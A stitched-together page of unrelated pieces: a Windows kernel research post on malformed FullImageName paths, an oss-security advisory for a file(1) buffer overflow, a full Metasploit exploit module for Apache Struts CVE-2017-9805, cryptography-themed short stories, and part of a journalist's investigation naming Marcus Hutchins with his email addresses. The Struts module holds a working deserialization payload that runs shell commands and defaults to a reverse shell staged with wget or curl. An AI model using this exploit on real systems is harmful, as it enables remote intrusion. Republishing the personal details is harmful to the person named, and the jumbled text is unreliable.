A different method, recommended by Microsoft, is to use a file-system mini-filter callback (IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION). In order to tell that a section object is part of a loaded executable image, one must check for the existence of the SEC_IMAGE flag passed to NtCreateSection. However, the file-system mini-filter callback does not receive this flag, and it is therefore impossible to determine whether the section object is being created for the loading of a PE image or not.
The Bad: Wrong Module Parameter
The only parameter that can effectively identify the loaded PE file is the FullImageName parameter.
However, in each of the scenarios described earlier the kernel uses a different format for FullImageName.
At first glance, we noticed that while we do get the full path of the process executable file and constant values for system DLLs (that are missing the volume name), for the rest of the dynamically loaded user-mode PEs the paths provided are missing the volume name.
What’s more alarming is that not only does that path come without the volume name, sometimes the path is completely malformed, and could point to a different or non-existing file.
RTFM
So as every researcher\developer does, the first thing we did was to go back to the documentation and make sure we understood it properly.
According to MSDN, the description of FullImageName implies it is the path of the file on disk since it “identifies the executable image file”. There is no mention of these invalid or non-existing paths.
The documentation does state that it may be NULL: “(The FullImageName parameter can be NULL in cases in which the operating system is unable to obtain the full name of the image at process creation time.)”. But clearly, if the parameter is not NULL, it means the kernel was able to successfully retrieve the correct image name.
There’s More than Just Typos in the Documentation
Another thing that caught our attention while perusing the documentation was that the function prototype as shown on MSDN is wrong. The Create parameter, which according to its description doesn’t even seem to be related to this mechanism, doesn’t exist in the function prototype from the WDK. Ironically, using the prototype specified on MSDN causes a crash due to stack corruption.
Under the Hood
nt!PsCallImageNotifyRoutines is in charge of invoking the registered callbacks. It merely passes along the UNICODE_STRING pointer it receives from its own caller to the callbacks as the FullImageName parameter. When nt!MiMapViewOfImageSection maps a section as an image this UNICODE_STRING is the FileName field of the FILE_OBJECT represented by that section.
Figure 2: FullImageName passed to the notification routine is actually the FILE_OBJECT’s FileName field.
The FILE_OBJECT is obtained by going through the SECTION -> SEGMENT -> CONTROL_AREA. These are internal and undocumented kernel structures. The Memory Manager creates these structures when mapping a file into memory, and uses these structures internally as long as the file is mapped.
Figure 3: nt!MiMapViewOfImageSection obtaining the FILE_OBJECT before calling nt!PsCallImageNotifyRoutines
There’s a single SEGMENT structure per mapped image. This means that multiple sections of the same image that exists simultaneously, within the same process or across processes, use the same SEGMENT and CONTROL_AREA. This explains why the argument FullImageName was identical when the same PE file as loaded into different processes at the same time.
RTFM Again
In order to understand how the FileName field is set and managed we went back to the documentation and according to MSDN using it is forbidden! “[The value] in this string is valid only during the initial processing of an IRP_MJ_CREATE request. This file name should not be considered valid after the file system starts to process the IRP_MJ_CREATE request” and at this point the FILE_OBJECT is clearly used after the file-system completed the IRP_MJ_CREATE request.
Now it’s obvious that the NTFS driver takes ownership of this UNICODE_STRING (FILE_OBJECT.FileName).
Using a kernel debugger, we found that ntfs!NtfsUpdateCcbsForLcbMove is the function responsible for the renaming operation. While looking at this function we inferred that during the IRP_MJ_CREATE request the file-system driver simply creates a shallow copy of FILE_OBJECT.FileName and maintains it separately. This means that only the address of the buffer is copied, not the buffer itself.
Root Cause Analysis
As long as the new path length won’t exceed the MaximumLength, the shared buffer will be overwritten without updating the Length field of FILE_OBJECT.FileName, which is where the kernel gets the string for the notification routine. If the new path length exceeds the MaximumLength, a new buffer will be allocated and the notification routine will get a completely outdated value.
Even though we finally figured out the cause for this bug something still didn’t add up. Why is it that even after all the handles to the image (from SECTIONs and FILE_OBJECTs) were closed we are still seeing these malformed paths? If all handles to the file were indeed closed, the next time the PE image will be opened and loaded a new FILE_OBJECT should be created without references and with the most up to date path.
Instead, the FullImageName still pointed to the old UNICODE_STRING. This proved that the FILE_OBJECT wasn’t closed although its handle count was 0, which means the reference count must have been higher than 0. We were also able to confirm this using a debugger.
Bottom Line
As a ref count leak in the kernel isn’t very likely we are left with one immediate suspect: The Cache Manager. What seems to be caching behavior, along with the way the file-system driver maintains the file name and a severe coding error is what ultimately causes the invalid name issue.
Pausing to reflect
At this point we were sure we figured out what causes the problem though what eluded us was how can it be that this bug still exists? And there’s no obvious solution for it?
In our next post, we’ll cover our endeavors to find good answers for these questions.
————————————————–
[1] Depending on the dwFlags parameter
[2] Depending on the dwAllocationAttributes of NtCreateSection
Note: majority of the analysis was done on a Windows 7 SP1 x86 fully patched and updated machine.
The findings were also verified to be present on Windows XP SP3, Windows 7 SP1 x64, Windows 10 Anniversary Update (Redstone) both x86 and x64 all fully patched and updated as well.-
1
-
CVE-2017-1000249: file: stack based buffer overflow From: Thomas Jarosch <thomas.jarosch () intra2net com> Date: Tue, 05 Sep 2017 18:24:24 +0200 Hello oss security, file(1) versions 5.29, 5.30 and 5.31 contain a stack based buffer overflow when parsing a specially crafted input file. The issue lets an attacker overwrite a fixed 20 bytes stack buffer with a specially crafted .notes section in an ELF binary file. There are systems like amavisd-new that automatically run file(1) on every email attachment. To prevent an automated exploit by email, another layer of protection like -fstack-protector is needed. Upstream fix: https://github.com/file/file/commit/35c94dc6acc418f1ad7f6241a6680e5327495793 The issue was introduced with this code change in October 2016: https://github.com/file/file/commit/9611f31313a93aa036389c5f3b15eea53510d4d1 file-5.32 has been released including the fix: ftp://ftp.astron.com/pub/file/file-5.32.tar.gz ftp://ftp.astron.com/pub/file/file-5.32.tar.gz.asc [An official release announcement on the file mailinglist will follow once a temporary outage of the mailinglist is solved] The cppcheck tool helped to discover the issue: ---- [readelf.c:514]: (warning) Logical disjunction always evaluates to true: descsz >= 4 || descsz <= 20. ---- Credits: The issue has been found by Thomas Jarosch of Intra2net AG. Code fix and new release provided by Christos Zoulas. Fixed packages from distributions should start to be available soon. Timeline (key entries): 2017-08-26: Notified the maintainer Christos Zoulas 2017-08-27: Christos pushed a fix to CVS / git with innocent looking commit message 2017-08-28: Notified Redhat security team to coordinate release and request CVE ID. Redhat responds it's better to directly contact the distros list instead through them. 2017-09-01: Notified distros mailinglist, asking for CVE ID and requesting embargo until 2017-09-08 2017-09-01: CVE-2017-1000249 ID is assigned 2017-09-04: After discussion that the issue is semi-public already, moved embargo date to 2017-09-05 2017-09-05: Public release Best regards, Thomas Jarosch / Intra2net AG
-
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Struts 2 REST Plugin XStream RCE', 'Description' => %q{ The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads. }, 'Author' => [ 'Man Yue Mo', # Vuln 'caiqiiqi', # PoC 'wvu' # Module ], 'References' => [ ['CVE', '2017-9805'], ['URL', 'https://struts.apache.org/docs/s2-052.html'], ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], ['URL', 'http://blog.csdn.net/caiqiiqi/article/details/77861477'] ], 'DisclosureDate' => 'Sep 5 2017', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux', 'win'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Apache Struts 2.5 - 2.5.12', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https', 'CMDSTAGER::FLAVOR' => 'wget' }, 'CmdStagerFlavor' => ['wget', 'curl'] )) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to Struts app', '/struts2-rest-showcase/orders/3']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => target_uri.path ) if res && res.code == 200 CheckCode::Detected else CheckCode::Safe end end def exploit execute_cmdstager end def execute_command(cmd, opts = {}) send_request_cgi( 'method' => 'POST', 'uri' => target_uri.path, 'ctype' => 'application/xml', 'data' => xml_payload(cmd) ) end def xml_payload(cmd) # xmllint --format <<EOF <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/bin/sh</string><string>-c</string><string>#{cmd}</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer/> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> EOF end end
-
2
-
-
1.
Professor Krankenstein was the most influential genetic engineer of his time.
When, in the spring of 2030, he almost incidentally invented the most terrible biological weapon known to humanity it took him about three seconds to realize that should his invention fall into the hands of one of the superpowers -- or into the hands of any common idiot, really -- it could well mean the end of the human race.
He wasted no time. He destroyed all the artifacts in the lab. He burned all the notes and hard disks of all the computers they’ve used in the project. He seeded false information all over the place to lead future investigators off the track.
Now, left with the last remaining copy of the doomsgerm recipe, he was contemplating whether to destroy it.
Yes, destroying it would keep the world safe. But if such a breakthrough in genetic engineering was used in a different way it could have solved the hunger problem by producing enough artificial food to feed the swelling population of Earth. And if global warming went catastrophic, it could have been used to engineer microorganisms super-efficient at sequestering carbon dioxide and methane from atmosphere.
In the end he decided not to destroy but rather to encrypt the recipe, put it into a tungsten box, encase the box in concrete and drop it from a cruise ship into Mariana Trench.The story would have ended there if it was not for one Hendrik Koppel, a rather simple-minded person whom professor Krankenstein hired to help him to move the tungsten-concrete box around. Professor didn’t even met him before he destroyed all his doomsgerm research. Still, Hendrik somehow realized that the issue was of interest to superpowers (Was professor Krankenstein sleep-talking?) and sold the information about the location of the box to several governments.
By the beginning of October the news hit that an American aircraft carrier is heading in the direction of Mariana Trench.
Apparently, there was also a Russian nuclear submarine on its way to the same location.
Chinese government have sent a fleet of smaller, more versatile, oceanographic vessels.
After the initial bout of despair, professor Krankenstein realised that with his superior knowledge of the position of the box he could possibly get to the location first and destroy the box using an underwater bomb.
He used his life savings to buy a rusty old ship called Amor Patrio, manned it with his closest collaborators and set up for Pacific Ocean.
...
Things haven't gone well. News reported that Americans and Chinese were approaching the area while Amor Patrio's engine broke and the crew was working around the clock to fix it.
Finally, they fixed it and approached Mariana Trench.
It was at that point that the news reached them: The box was found by Russians and transported to Moscow. It was now stored in the vault underneath KGB headquarters. There was a whole division of spetsnaz guarding the building. The building itself was filled with special agents, each trained in twelve ways of silently killing a person.
Professor Krankenstein and his associated held a meeting on board of Amor Patrio, in the middle of Pacific Ocean. People came up with desperate proposals: Let's dig a tunnel underneath Moscow river. Let's blackmail Russians by re-creating the virus and threatening them to disperse it in Russia. Nuke the entire Moskovskaya Oblast! There was no end to wild and desperate proposals.
Once the stream of proposals dried up, everyone looked at professor Krankenstein, awaiting his decision.
The silence is almost palpable.
Professor Krankenstein slowly took out his iconic pipe and lighted it with the paper which had the decryption key written on it.
13.
No full story yet, but let's assume a king is at a quest. At some point he realizes that a small item, say a specific hairpin, is needed to complete the quest. He clearly remembers he used to own the hairpin, but he has no idea whether it's still in his possession and if so, where exactly it is. He sends a messenger home asking his counsellors to look for the hairpin and let him know whether they've found it or not.
King's enemies need that information as well so the next day, when the messager is returning, they ambush him and take the message. Unfortunately, the message is encrypted. The messager himself knows nothing about the pin.
Many experienced cryptographers are working around the clock for days in row to decrypt the message but to no avail.
Finally, a kid wanders into the war room. She asks about what they are doing and after some thinking she says: "I know nothing about the high art of cryptography and in no way I can compare to esteemed savants in this room. What I know, though, is that King's pallace has ten thousand rooms, each full of luxury, pictures and finely carved furniture. To find a hairpin in such a place can take weeks if not months. If there was no hairpin it would take at least that long before they could send the messenger back with negative reply. So, if the messager was captured on his way back on the very next day, it can mean only a single thing: The hairpin was found and your encrypted message says so."
20.
Here Legrand, having re-heated the parchment, submitted It my inspection. The following characters were rudely traced, in a red tint, between the death's-head and the goat:
53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!; 46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*; 4069285);)6 !8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;48;(88;4(+?3 4;48)4+;161;:188;+?;
"But," said I, returning him the slip, "I am as much in the dark as ever. Were all the jewels of Golconda awaiting me on my solution of this enigma, I am quite sure that I should be unable to earn them."
"And yet," said Legrand, "the solution is by no means so difficult as you might be led to imagine from the first hasty inspection of the characters. These characters, as any one might readily guess, form a cipher --that is to say, they convey a meaning; but then, from what is known of Kidd, I could not suppose him capable of constructing any of the more abstruse cryptographs. I made up my mind, at once, that this was of a simple species --such, however, as would appear, to the crude intellect of the sailor, absolutely insoluble without the key."
"And you really solved it?"
"Readily; I have solved others of an abstruseness ten thousand times greater. Circumstances, and a certain bias of mind, have led me to take interest in such riddles, and it may well be doubted whether human ingenuity can construct an enigma of the kind which human ingenuity may not, by proper application, resolve. In fact, having once established connected and legible characters, I scarcely gave a thought to the mere difficulty of developing their import.
"In the present case --indeed in all cases of secret writing --the first question regards the language of the cipher; for the principles of solution, so far, especially, as the more simple ciphers are concerned, depend on, and are varied by, the genius of the particular idiom. In general, there is no alternative but experiment (directed by probabilities) of every tongue known to him who attempts the solution, until the true one be attained. But, with the cipher now before us, all difficulty is removed by the signature. The pun on the word 'Kidd' is appreciable in no other language than the English. But for this consideration I should have begun my attempts with the Spanish and French, as the tongues in which a secret of this kind would most naturally have been written by a pirate of the Spanish main. As it was, I assumed the cryptograph to be English.
"You observe there are no divisions between the words. Had there been divisions, the task would have been comparatively easy. In such case I should have commenced with a collation and analysis of the shorter words, and, had a word of a single letter occurred, as is most likely, (a or I, for example,) I should have considered the solution as assured. But, there being no division, my first step was to ascertain the predominant letters, as well as the least frequent. Counting all, I constructed a table, thus:
Of the character 8 there are 33.
; " 26. 4 " 19. + ) " 16. * " 13. 5 " 12. 6 " 11. ! 1 " 8. 0 " 6. 9 2 " 5. : 3 " 4. ? " 3. ` " 2. - . " 1.
"Now, in English, the letter which most frequently occurs is e. Afterwards, the succession runs thus: a o i d h n r s t u y c f g l m w b k p q x z. E however predominates so remarkably that an individual sentence of any length is rarely seen, in which it is not the prevailing character.
"Here, then, we have, in the very beginning, the groundwork for something more than a mere guess. The general use which may be made of the table is obvious --but, in this particular cipher, we shall only very partially require its aid. As our predominant character is 8, we will commence by assuming it as the e of the natural alphabet. To verify the supposition, let us observe if the 8 be seen often in couples --for e is doubled with great frequency in English --in such words, for example, as 'meet,' 'fleet,' 'speed, 'seen,' 'been,' 'agree,' &c. In the present instance we see it doubled less than five times, although the cryptograph is brief.
"Let us assume 8, then, as e. Now, of all words in the language, 'the' is the most usual; let us see, therefore, whether they are not repetitions of any three characters in the same order of collocation, the last of them being 8. If we discover repetitions of such letters, so arranged, they will most probably represent the word 'the.' On inspection, we find no less than seven such arrangements, the characters being ;48. We may, therefore, assume that the semicolon represents t, that 4 represents h, and that 8 represents e --the last being now well confirmed. Thus a great step has been taken.
"But, having established a single word, we are enabled to establish a vastly important point; that is to say, several commencements and terminations of other words. Let us refer, for example, to the last instance but one, in which the combination ;48 occurs --not far from the end of the cipher. We know that the semicolon immediately ensuing is the commencement of a word, and, of the six characters succeeding this 'the,' we are cognizant of no less than five. Let us set these characters down, thus, by the letters we know them to represent, leaving a space for the unknown--
t eeth.
"Here we are enabled, at once, to discard the 'th,' as forming no portion of the word commencing with the first t; since, by experiment of the entire alphabet for a letter adapted to the vacancy we perceive that no word can be formed of which this th can be a part. We are thus narrowed into
t ee,
and, going through the alphabet, if necessary, as before, we arrive at the word 'tree,' as the sole possible reading. We thus gain another letter, r, represented by (, with the words 'the tree' in juxtaposition.
"Looking beyond these words, for a short distance, we again see the combination ;48, and employ it by way of termination to what immediately precedes. We have thus this arrangement:
the tree ;4(+?34 the,
or substituting the natural letters, where known, it reads thus:
the tree thr+?3h the.
"Now, if, in place of the unknown characters, we leave blank spaces, or substitute dots, we read thus:
the tree thr...h the,
when the word 'through' makes itself evident at once. But this discovery gives us three new letters, o, u and g, represented by + ? and 3.
"Looking now, narrowly, through the cipher for combinations of known characters, we find, not very far from the beginning, this arrangement,
83(88, or egree, which, plainly, is the conclusion of the word 'degree,' and gives us another letter, d, represented by !."Four letters beyond the word 'degree,' we perceive the combination
46(;88*.
"Translating the known characters, and representing the unknown by dots, as before, we read thus:
th.rtee.
an arrangement immediately suggestive of the word 'thirteen,' and again furnishing us with two new characters, i and n, represented by 6 and *.
"Referring, now, to the beginning of the cryptograph, we find the combination,
53++!.
"Translating, as before, we obtain
.good,
which assures us that the first letter is A, and that the first two words are 'A good.'
"To avoid confusion, it is now time that we arrange our key, as far as discovered, in a tabular form. It will stand thus:
5 represents a ! " d 8 " e 3 " g 4 " h 6 " i * " n + " o ( " r ; " t
"We have, therefore, no less than ten of the most important letters represented, and it will be unnecessary to proceed with the details of the solution. I have said enough to convince you that ciphers of this nature are readily soluble, and to give you some insight into the rationale of their development. But be assured that the specimen before us appertains to the very simplest species of cryptograph. It now only remains to give you the full translation of the characters upon the parchment, as unriddled. Here it is:
'A good glass in the bishop's hostel in the devil's seat twenty-one degrees and thirteen minutes northeast and by north main branch seventh limb east side shoot from the left eye of the death's-head a bee line from the tree through the shot fifty feet out.'"
"But," said I, "the enigma seems still in as bad a condition as ever. How is it possible to extort a meaning from all this jargon about 'devil's seats,' 'death's-heads,' and 'bishop's hostel'?"
"I confess," replied Legrand, "that the matter still wears a serious aspect, when regarded with a casual glance. My first endeavor was to divide the sentence into the natural division intended by the cryptographist."
"You mean, to punctuate it?"
"Something of that kind."
"But how was it possible to effect this?"
"I reflected that it had been a point with the writer to run his words together without division, so as to increase the difficulty of solution. Now, a not overacute man, in pursuing such an object, would be nearly certain to overdo the matter. When, in the course of his composition, he arrived at a break in his subject which would naturally require a pause, or a point, he would be exceedingly apt to run his characters, at this place, more than usually close together. If you will observe the MS., in the present instance, you will easily detect five such cases of unusual crowding. Acting on this hint, I made the division thus:
'A good glass in the bishop's hostel in the devil's --twenty-one degrees and thirteen minutes --northeast and by north --main branch seventh limb east side --shoot from the left eye of the death's-head --a bee-line from the tree through the shot fifty feet out.'"
"Even this division," said I, "leaves me still in the dark."
32.
A portal suddenly opened on the starboard ejecting a fleet of imperial pursuit vessels. The propulsion system of my ship got hit before the shield activated. I’ve tried to switch on the backup drive but before it charged to 5% I was already dangling off a dozen tractor beams.
It wasn’t much of a fight. They’ve just came and picked me up as one would pick up a box of frozen strawberries in a supermarket.
I must have passed out because of pressure loss because the next thing I remember is being in a plain white room with my hands cuffed behind my back.
There was a sound of door opening and a person walked into my field of vision.
It took me few seconds to realize who the man was. He was wearing an old-fashioned black suit and a bowler hat, black umbrella in his hand, not the baggy trousers seen on his official portraits. But then he smiled and showed the glistening golden teeth on the left side and his own healthy camel-like teeth on the right and the realization hit me.
It was him. Beylerbey Qgdzzxoglu in person.
“Peace be upon you,” he said. Then he sat down on the other side of a little coffee table, made himself comfortable and put his umbrella on the floor.
“We have a little matter to discuss, you and I,” he said.
He took a paper out of his pocket and put in on the coffee table, spinning it so that I can read it.
“Attack the Phlesmus Pashalik,” said one line.
“Attack the Iconium Cluster,” said the line below it.
The rest of the sheet was empty except for holographic seal of High Command of Proximian Insurgency.
"Comandante Ribeira is no fool," he said, "And this scrap of paper is not going to convince me that he's going to split his forces and attack both those places at the same time. Our strategic machines are vastly more powerful than Proximian ones, they've been running hot for the past week and out lab rats tell us that there's no way to win that way."
"You are right, O leader of men," I said.
I knew that this kind of empty flattery was used at the Sublime Porte but I was not sure whether it wasn't reserved for the sultan alone.
Qgdzzxoglu smiled snarkily but haven't said anything. Maybe I was going to live in the end.
"I have no loyalty for the Proximian cause and before the rebelion I have lived happily and had no thoughts of betrayal. And now, hoping for your mercy, I am going to disclose the true meaning of this message to you."
"It is a code, O you, whose slipper weights heavily upon the neck of nations," I said, "The recepient is supposed to ignore the first sentence and only follow the second one."
I hoped I haven't overdone it. Being honest with the enemy is hard.
"So you are trying to convince me that de Ribeira is going to attack Iconium," he gave me a sharp look, apparently trying to determine whether I was lying or not. "And you know what? We've got our reports. And our reports are saying that rebels will try to trick us into moving all our forces into Iconium and then attack pashalik of Phlesmus while it's undefended. And if that's what you are trying to do bad things are going to happen to your proboscis."
"The Most Holy Cross, John XXIII and Our Lady of Africa have already got a command to move to Iconium cluster. And you should expect at least comparable fire force from elsewhere."
...
The messenger has no intention to suffer to win someone else's war. At the same time it's clear that if he continues to tell truth he will be tortured. So he says that general is right and it's the first sentence that should be taken into account.
The general begins to feel a bit uneasy at this point. He has two contradictory confessions and it's not at all clear which one is correct.
He orders the torture to proceed only to make the messager change his confession once again.
...
“Today, the God, the Compassionate, the Merciful have taught me that there are secrets that cannot be given away. You cannot give them away to save yourself from torture. You cannot give them away to save your kids from being sold to slavery. You cannot give them away to prevent the end of the world. You just cannot give them away and whether you want to or not matters little.”
54.
Here's a simple game for kids that shows how asymmetric encryption works in principle, makes the fact that with only public key at your disposal encryption may be easy while decryption may be so hard as to be basically impossible, intuitive and gives everyone a hands-on experience with a simple asymmetric encryption system.
Here's how it works:
Buy a dictionary of some exotic language. The language being exotic makes it improbable that any of the kids involved in the game would understand it. Also, it makes cheating by using Google Translate impossible.
Let's say you've opted for Eskimo language. The story of the game can be located at the North Pole after all.
You should prefer a dictionary that comes in two bands: English-Eskimo dictionary and Eskimo-English dictionary. The former will play the role of public key and the latter the role of secret key. Obviously, if there's no two-band dictionary available, you'll have to cut a single-band one in two.
To distribute the public key to everyone involved in the game you can either buy multiple copies of English-Eskimo dictionary, which may be expensive, or you can simply place a single copy at a well-known location. In school library, at a local mom-and-pop shop or at a secret place known only to the game participants.
If a kid wants to send an encrypted message to the owner of the secret key, they just use the public key (English-Eskimo dictionary) to translate the message, word-by-word, from English to Eskimo. The owner of the secret key (Eskimo-English dictionary) can then easily decrypt the message by translating it back into English.
However, if the message gets intercepted by any other game participant, decrypting it would be an extremely time consuming activity. Each word of the message would have to be found in English-Eskimo dictionary, which would in turn mean scanning the whole dictionary in a page-by-page and word-by-word manner!
78.
It's a puppet show. There are two hills on the stage with country border between them. Law-abiding citizen is on the right hill. Smuggler enters the stage on the left.
SMUGGLER: Hey, you!
CITIZEN: Who? Me?
SMUGGLER: Do you like booze?
CITIZEN: Sure I do. And who are you?
SMUGGLER: I'm the person who will sell you some booze.
CITIZEN: What about cigarettes?
SMUGGLERS: Sure thing. Cheap Ukrainian variety for $1 a pack. Also Slovenian Mariboro brand.
CITIZEN: Thanks God! I am getting sick of our government trying to make me healthy!
Border patrol emerges from a bush in the middle of the stage.
PATROL: Forget about it, guys! This is a state border. Nothing's gonna pass one way or the other. You better pack your stuff and go home.
SMUGGLER: Ignore him. We'll meet later on at some other place, without border patrol around, and you'll get all the booze and cigarettes you want.
PATROL: Ha! I would like to see that. Both of you are going to end up in jail.
CITIZEN: He's right. If you tell me where to meet, he's going to hear that, go there and arrest us.
...
Smuggler has a list of possible places to meet:
- Big oak at 57th mile of the border.
- Lower end of Abe Smith's pasture.
- ...
- ...
He obfuscates each entry and shout them to the citizen in no particular order.
Citizen chooses one of the puzzles and de-obfuscates it. It takes him 10 minutes. The de-obfuscates message reads: "18. Behind the old brick factory."
CITIZEN (cries): Eighteen!
SMUGGLER: Ok, got it, let's meet there in an hour!
PATROL: Oh my, oh my. I am much better at de-obfuscation than that moron citizen. I've already got two messages solved. But one has number 56, the other number 110. I have no idea which one is going to be number 18. There's no way I can find the right one in just one hour!
The curtain comes down. Happy gulping sounds can be heard from the backstage.
99.
Mr. X is approached in the subway by a guy who claims to be an alien stranded on Earth and to possess time machine that allows him to know the future. He needs funds to fix his flying saucer but filling in winning numbers for next week's lottery would create a time paradox. Therefore, he's willing to sell next week's winning numbers to Mr. X at a favourable price.
Mr. X, as gullible as he is, feels that this may be a scam and asks for a proof. Alien gives him the next week's winning numbers in encrypted form so that Mr. X can't use them and then decide not to pay for them. After the lottery draw he'll give Mr. X the key to unlock the file and Mr. X can verify that the prediction was correct.
After the draw, Mr. X gets the key and lo and behold, the numbers are correct! To rule out the possibility that it happened by chance, they do the experiment twice. Then thrice.
Finally, Mr. X is persuaded. He pays the alien and gets the set of numbers for the next week's draw.
But the numbers drawn are completely different.
And now the question: How did the scam work?
NOTE: The claim about the time paradox is super weak. To improve the story the alien can ask for something non-monetary (sex, political influence). Or, more generally, positive demonstration of knowledge of the future can be used to make people do what you want. E.g. "I know that an asteroid is going to destroy Earth in one year. Give me all your money to build a starship to save you."
-
1
-
05
Sep 17Who Is Marcus Hutchins?
In early August 2017, FBI agents in Las Vegas arrested 23-year-old British security researcher Marcus Hutchins on suspicion of authoring and/or selling “Kronos,” a strain of malware designed to steal online banking credentials. Hutchins was virtually unknown to most in the security community until May 2017 when the U.K. media revealed him as the “accidental hero” who inadvertently halted the global spread of WannaCry, a ransomware contagion that had taken the world by storm just days before.
Relatively few knew it before his arrest, but Hutchins has for many years authored the popular cybersecurity blog MalwareTech. When this fact became more widely known — combined with his hero status for halting Wannacry — a great many MalwareTech readers quickly leapt to his defense to denounce his arrest. They reasoned that the government’s case was built on flimsy and scant evidence, noting that Hutchins has worked tirelessly to expose cybercriminals and their malicious tools. To date, some 226 supporters have donated more than $14,000 to his defense fund.
Marcus Hutchins, just after he was revealed as the security expert who stopped the WannaCry worm. Image: twitter.com/malwaretechblog
At first, I did not believe the charges against Hutchins would hold up under scrutiny. But as I began to dig deeper into the history tied to dozens of hacker forum pseudonyms, email addresses and domains he apparently used over the past decade, a very different picture began to emerge.
In this post, I will attempt to describe and illustrate more than three weeks’ worth of connecting the dots from what appear to be Hutchins’ earliest hacker forum accounts to his real-life identity. The clues suggest that Hutchins began developing and selling malware in his mid-teens — only to later develop a change of heart and earnestly endeavor to leave that part of his life squarely in the rearview mirror.
GH0STHOSTING/IARKEY
I began this investigation with a simple search of domain name registration records at domaintools.com [full disclosure: Domain Tools recently was an advertiser on this site]. A search for “Marcus Hutchins” turned up a half dozen domains registered to a U.K. resident by the same name who supplied the email address “surfallday2day@hotmail.co.uk.”
One of those domains — Gh0sthosting[dot]com (the third character in that domain is a zero) — corresponds to a hosting service that was advertised and sold circa 2009-2010 on Hackforums[dot]net, a massively popular forum overrun with young, impressionable men who desperately wish to be elite coders or hackers (or at least recognized as such by their peers).
The surfallday2day@hotmail.co.uk address tied to Gh0sthosting’s initial domain registration records also was used to register a Skype account named Iarkey that listed its alias as “Marcus.” A Twitter account registered in 2009 under the nickname “Iarkey” points to Gh0sthosting[dot]com.
Gh0sthosting was sold by a Hackforums user who used the same Iarkey nickname, and in 2009 Iarkey told fellow Hackforums users in a sales thread for his business that Gh0sthosting was “mainly for blackhats wanting to phish.” In a separate post just a few days apart from that sales thread, Iarkey responds that he is “only 15” years old, and in another he confirms that his email address is surfallday2day@hotmail.co.uk.
A review of the historic reputation tied to the Gh0sthosting domain suggests that at least some customers took Iarkey up on his offer: Malwaredomainlist.com, for example, shows that around this same time in 2009 Gh0sthosting was observed hosting plenty of malware, including trojan horse programs, phishing pages and malware exploits.
A “reverse WHOIS” search at Domaintools.com shows that Iarkey’s surfallday2day email address was used initially to register several other domains, including uploadwith[dot]us and thecodebases[dot]com.
Shortly after registering Gh0sthosting and other domains tied to his surfallday2day@hotmail.co.uk address, Iarkey evidently thought better of including his real name and email address in his domain name registration records. Thecodebases[dot]com, for example, changed its WHOIS ownership to a “James Green” in the U.K., and switched the email to “herpderpderp2@hotmail.co.uk.”
A reverse WHOIS lookup at domaintools.com for that email address shows it was used to register a Hackforums parody (or phishing?) site called Heckforums[dot]net. The domain records showed this address was tied to a Hackforums clique called “Atthackers.” The records also listed a Michael Chanata from Florida as the owner. We’ll come back to Michael Chanata and Atthackers at the end of this post.
DA LOSER/FLIPERTYJOPKINS
As early as 2009, Iarkey was outed several times on Hackforums as being Marcus Hutchins from the United Kingdom. In most of those instances he makes no effort to deny the association — and in a handful of posts he laments that fellow members felt the need to “dox” him by posting his real address and name in the hacking forum for all to see.
Iarkey, like many other extremely active Hackforums users, changed his nickname on the forum constantly, and two of his early nicknames on Hackforums around 2009 were “Flipertyjopkins” and “Da Loser“.
Happily, Hackforums has a useful feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account.
This is especially evident in multi-page Hackforums discussion threads that span many days or weeks: If a user changes his nickname during that time, the forum is set up so that it includes the user’s most previous nickname in any replies that quote the original nickname — ostensibly so that users can follow along with who’s who and who said what to whom.
In the screen shot below, for instance, we can see one of Hutchins’ earliest accounts — Da Loser — being quoted under his Flipertyjopkins nickname.
Both the Da Loser and Flipertyjopkins identities on Hackforums referenced the same domains in 2009 as theirs — Gh0sthosting — as well as another domain called “hackblack.co[dot]uk.” Da Loser references the hackblack domain as the place where other Hackforums users can download “the sourcecode of my IE/MSN messenger password stealer (aka M_Stealer).”
